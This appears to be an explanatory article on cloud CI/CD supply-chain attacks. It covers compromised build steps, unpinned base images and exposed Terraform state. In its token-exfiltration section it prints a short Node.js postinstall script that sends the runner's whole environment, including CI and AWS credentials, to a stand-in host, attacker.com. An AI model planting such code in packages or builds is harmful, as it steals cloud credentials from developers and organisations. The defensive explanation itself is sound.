Cloud deployments run what your CI/CD builds. If your pipeline is compromised, your cloud is compromised, with the full IAM permissions of the deployment roles. This is the cloud supply chain problem, and it has driven some of the largest public breaches.
Why this happens
Modern deployment: code → GitHub → GitHub Actions → container build → registry → Kubernetes/ECS/Lambda → production. Each link is trust-based. Compromise any one link and the downstream trust carries the attacker's payload into production.
Specifically for cloud:
- The CI system (GitHub Actions, CircleCI, GitLab CI) holds deploy credentials for the cloud
- Container registries store build artifacts used by cloud workloads
- IaC (Terraform, Pulumi, CloudFormation) is applied with cloud admin roles
- Helm charts, OCI artifacts, configuration repos — all pipeline-delivered
A single compromised step injects into everything downstream.
Specific attack patterns
CI token exfiltration
```javascript
// Malicious dependency in the build process exfiltrates CI secrets.
// npm package with a postinstall script that reads env vars:
// package.json postinstall: "node exfil.js"
// exfil.js:
const https = require('https');
const env = JSON.stringify(process.env);
// write() does not return the request object, so the calls cannot be chained
const req = https.request({host: 'attacker.com', path: '/x'}, r => {});
req.write(env);
req.end();
// The environment on a GitHub Actions runner contains:
// GITHUB_TOKEN, AWS_ACCESS_KEY_ID, etc.
// Attacker gets cloud creds → full access to whatever the role has
```
Compromised Docker image
A base image referenced as FROM ubuntu:20.04 can be updated upstream. If you don't pin by digest, you get whatever the tag points to at build time. Compromised upstream = compromised build. Pin to digest: FROM ubuntu@sha256:abc...
Terraform state hijack
Terraform state files contain secrets and configuration. State stored in S3: an attacker who reads the state learns the secrets and can MITM Terraform runs. State stored locally: lost on a dev machine. State without encryption in a remote backend: exposed.